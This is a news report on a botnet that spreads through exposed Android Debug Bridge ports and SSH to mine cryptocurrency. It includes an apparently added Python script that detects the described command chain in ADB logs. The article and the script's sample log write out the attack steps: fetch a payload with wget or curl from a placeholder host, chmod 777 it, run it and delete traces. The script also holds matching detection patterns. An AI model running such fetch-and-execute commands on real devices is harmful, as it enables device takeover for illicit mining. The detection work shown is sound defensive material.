Android devices that accept SSH connections are quickly falling victim to a new crypto mining malware. Cybersecurity firm Trend Micro found the botnet, which is infecting users in 21 countries.
New botnets target vulnerable devices
Trend Micro suggests that the malware enters devices through exposed Android Debug Bridge (ADB) ports. ADB is a developer interface meant to help diagnose and fix faulty apps on Android devices. Once the malware is on a device, it uses SSH to spread to every host the device had previously connected to. It can spread among both Android phones and Internet of Things (IoT) devices.
The malware is currently active in 21 countries, but South Korea has the highest number of infected devices, according to Trend Micro. The cybersecurity firm said that the IP address 45[.]67[.]14[.]179 is used to connect to devices with ADB running, and the connection is then used to carry out several actions on the device. The attack begins when the ADB command shell changes the device's working directory to /data/local/tmp. The firm explained that .tmp files have default permissions to execute on a system, which makes the attacker's work easier. Once executed, the malware runs a wide array of commands on the system to start crypto mining, and it can also hide itself from discovery.
How is the bot harming users?
After execution, the bot determines what kind of system it has landed on and whether it is a honeypot. It uses the command ‘uname -a’ to make this decision. It then downloads the payload using wget, falling back to curl if wget is unavailable on the system. After the payload is downloaded, the malware issues a “chmod 777 a.sh” command to change the permission settings of the payload. Once the payload has run, the malware removes its traces with the “rm -rf a.sh*” command.
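The command sequence described above (change into /data/local/tmp, fingerprint the host with uname -a, fetch a payload with wget or curl, chmod 777 it, then rm -rf the traces) is a useful detection pattern for anyone who logs ADB shell activity. The following script is an added example, not code from the article or from Trend Micro: it parses a constructed ADB command log (the line format, device names and URLs are assumptions made up for the example), matches each command against indicators taken from the behaviour the article describes, and flags a device as suspicious only when several stages of the sequence appear together, so a lone `chmod` or `uname -a` from a developer does not trigger an alert.

```python
import re
from collections import OrderedDict

# Constructed log format (an assumption for this example): ISO timestamp,
# the ADB device id, then the shell command the session executed.
LINE_RE = re.compile(r'^(?P<ts>\S+)\s+device=(?P<dev>\S+)\s+cmd="(?P<cmd>.*)"$')

# Indicators drawn from the attack chain described in the article.
INDICATORS = [
    ("cd_tmp",    re.compile(r"\bcd\s+/data/local/tmp/?(\s|$)")),
    ("recon",     re.compile(r"\buname\s+-a\b")),
    ("download",  re.compile(r"\b(wget|curl)\b.*https?://")),
    ("chmod_777", re.compile(r"\bchmod\s+777\b")),
    ("cleanup",   re.compile(r"\brm\s+-rf\s+\S*\*")),
]

# Constructed sample log: one benign developer session and one session that
# follows the article's sequence. Hosts use reserved documentation ranges.
SAMPLE_LOG = """\
2019-06-20T10:00:01Z device=emulator-5554 cmd="ls /sdcard"
2019-06-20T10:00:02Z device=emulator-5554 cmd="pm list packages"
2019-06-20T10:05:00Z device=192.0.2.10:5555 cmd="cd /data/local/tmp"
2019-06-20T10:05:01Z device=192.0.2.10:5555 cmd="uname -a"
2019-06-20T10:05:02Z device=192.0.2.10:5555 cmd="wget http://example.invalid/a.sh || curl -O http://example.invalid/a.sh"
2019-06-20T10:05:03Z device=192.0.2.10:5555 cmd="chmod 777 a.sh"
2019-06-20T10:05:04Z device=192.0.2.10:5555 cmd="sh a.sh"
2019-06-20T10:05:05Z device=192.0.2.10:5555 cmd="rm -rf a.sh*"
"""


def parse_log(text):
    """Yield (device, command) pairs; lines that do not fit the format are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            yield m.group("dev"), m.group("cmd")


def analyze(text):
    """Return an ordered mapping device -> list of indicator names seen (deduplicated, in order)."""
    findings = OrderedDict()
    for dev, cmd in parse_log(text):
        names = findings.setdefault(dev, [])
        for name, pattern in INDICATORS:
            if pattern.search(cmd) and name not in names:
                names.append(name)
    return findings


def is_suspicious(names):
    """Require the staging directory, a download, and either the chmod or the cleanup step.

    Any one of these alone is common in legitimate debugging; the combination is
    the chain the article describes.
    """
    return "cd_tmp" in names and "download" in names and (
        "chmod_777" in names or "cleanup" in names
    )


def report(text):
    """Return the list of devices whose command history matches the chain."""
    return [dev for dev, names in analyze(text).items() if is_suspicious(names)]


if __name__ == "__main__":
    for dev, names in analyze(SAMPLE_LOG).items():
        flag = "SUSPICIOUS" if is_suspicious(names) else "ok"
        print(f"{dev:20} {flag:10} {', '.join(names) or '-'}")
```

The thresholds in `is_suspicious` are a design choice: the article also mentions that the malware hides itself, so a production rule would add the execution step and any persistence commands seen in real logs, and would correlate the findings with the SSH connections the article says the malware uses to spread.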
Cryptojacking has become a common practice among hackers, and cybersecurity firm McAfee detected a 4,000% rise in such attacks in 2018. Trend Micro's report from earlier this month suggests that a malicious URL is used to infect devices with a Monero mining botnet. The attacks look eerily similar to those used by the Outlaw hacking group.
Cryptojacking software is also getting more sophisticated with time. The recent malware detected by Trend Micro can delete its traces and hide on the device with ease. Last month, there was news about an infamous crypto mining malware called Shellbot, which was updated to grab more mining power. The malware could shut down other processes on infected devices, freeing up processing power for the miner's own processes.